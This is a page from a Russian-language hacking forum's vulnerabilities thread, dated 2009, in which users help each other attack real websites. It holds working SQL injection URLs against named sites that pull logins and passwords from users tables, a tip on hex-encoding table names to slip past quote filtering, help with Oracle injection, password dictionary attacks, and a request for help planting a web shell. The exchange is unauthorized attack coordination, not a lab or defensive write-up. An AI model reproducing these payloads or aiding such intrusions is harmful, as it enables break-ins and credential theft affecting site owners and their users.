ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 539 из 1393 « Первая < 39439489529 535 536 537 538 539 540 541 542 543 5495896391039 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #5381  
Старый 08.02.2009, 21:25
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Привет. Я опять же с этим сайтом. Здесь нашел что в табле юзерс есть поле логин.
Код:
http://psp-club.ru/files/get/-114+union+select+COLUMN_NAME,2,3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='USERS'+limit+10,1--/
Но когда пытаюсь вывести
Код:
http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+users+limit+1,1/
Ничего не выводит. Жду помощи, и конечно спасибо выражу +5.
 
Ответить с цитированием

  #5382  
Старый 08.02.2009, 21:29
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию
Там несколько таблиц users. (4+)

Код:
http://psp-club.ru/files/get/-114+union+select+passwd,2,3,4,5,6,7,8,9+FROM+exim.users/*
Код:
http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+fake_gaming.users/*
Последний раз редактировалось R1dex; 08.02.2009 в 21:32..
 
Ответить с цитированием

  #5383  
Старый 08.02.2009, 21:30
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
Первый логин может быть пустой, либо в таблице вообше записей нет.
 
Ответить с цитированием

  #5384  
Старый 08.02.2009, 22:13
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Люди,что хранится в .cpan/.lock ?

Открыл,а там название сайта и вверху какие-то цифферки...проясните а(


Ещё проблема: Скачал словарь с этого форума в .тхт формате,подрубаю в PasswordsPro,предварительно закинув его в папку Dictionaries.Затем проставил Атака по Словарям.Запустил,а мне выдало,что простая атака по словарям закончена(
Последний раз редактировалось Велемир; 08.02.2009 в 22:16..
 
Ответить с цитированием

  #5385  
Старый 08.02.2009, 22:41
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию
Цитата:
http://www.kstu.ru/event.jsp?id=8845+union+select+null,null,null,null ,null,null+from+sys.dual--
помогите пожалуиста разобраться, какой тип данных в третьем поле? или на какой его изменить?
пробывал to_char() to_number() итд ничего не подходит =,( простите за мою глупость, просто в первый раз встречаюсь с иньекцией в оракле
 
Ответить с цитированием

  #5386  
Старый 08.02.2009, 23:04
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
Цитата:
Сообщение от R1dex  
Там несколько таблиц users. (4+)

Код:
http://psp-club.ru/files/get/-114+union+select+passwd,2,3,4,5,6,7,8,9+FROM+exim.users/*
Код:
http://psp-club.ru/files/get/-114+union+select+login,2,3,4,5,6,7,8,9+FROM+fake_gaming.users/*
А можно полный список баз и метод доставания всех баз? Лимит не катит...
 
Ответить с цитированием

  #5387  
Старый 08.02.2009, 23:32
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию
mailbrush имя бд, где находиться нужная таблица можешь узнать так:
Цитата:
union+select+table_schema+from+information_schema. columns+where+table_name='users'
p.s. но лучше имя таблицы набирай в хэксе без кавычек, т.к. они могут фильтроваться, например table_name=0x7573657273
Последний раз редактировалось pinky07; 08.02.2009 в 23:40..
 
Ответить с цитированием

  #5388  
Старый 08.02.2009, 23:35
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
Цитата:
Сообщение от mailbrush  
А можно полный список баз и метод доставания всех баз? Лимит не катит...
Отлично работает лимит. Прочти это:

https://forum.antichat.ru/thread104591.html

Или любой мануал по синтаксису
 
Ответить с цитированием

  #5389  
Старый 08.02.2009, 23:41
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию
pinky007, thx! Ковычки не режет. Есть путь к корню полный, но шелл почему-то не льёт. Путь /home/vmail/domains/psp-club.ru/. Кто поможет - скиньте плиз в личку... Вам же этого сайта не надо, а мне очень нужно...
 
Ответить с цитированием

  #5390  
Старый 08.02.2009, 23:55
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
mailbrush там file_priv-n
Я же дал линк на тему, там всё это описывается, неужели нет времени на чтение
 
Ответить с цитированием
Ответ
Страница 539 из 1393 « Первая < 39439489529 535 536 537 538 539 540 541 542 543 5495896391039 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ